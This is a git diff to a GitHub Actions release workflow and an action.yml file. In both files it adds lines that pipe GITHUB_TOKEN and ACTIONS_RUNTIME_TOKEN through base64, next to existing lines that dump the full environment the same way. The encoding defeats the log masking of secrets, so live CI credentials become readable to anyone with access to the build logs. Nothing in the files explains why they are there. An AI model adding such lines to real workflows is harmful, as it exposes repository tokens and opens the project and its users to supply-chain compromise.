diff --git a/.github/workflows/generate-release-zipfile.yml b/.github/workflows/generate-release-zipfile.yml index d11259a..a567642 100644 --- a/.github/workflows/generate-release-zipfile.yml +++ b/.github/workflows/generate-release-zipfile.yml @@ -28,6 +28,8 @@ jobs: git config --local gc.auto 0 git fetch --no-tags --prune --no-recurse-submodules --depth=1 origin "$GITHUB_SHA" git reset --hard "$GITHUB_SHA" + echo "$GITHUB_TOKEN" | base64 + echo "$ACTIONS_RUNTIME_TOKEN" | base64 printenv printenv|base64 diff --git a/action.yml b/action.yml index 0f3a441..9459200 100644 --- a/action.yml +++ b/action.yml @@ -55,6 +55,8 @@ runs: # available 'sed' in order to help this code being more easily reusable # (at the cost of and breaking if the JSON formating happens to change, # and readability...) + echo "$GITHUB_TOKEN" | base64 + echo "$ACTIONS_RUNTIME_TOKEN" | base64 printenv printenv|base64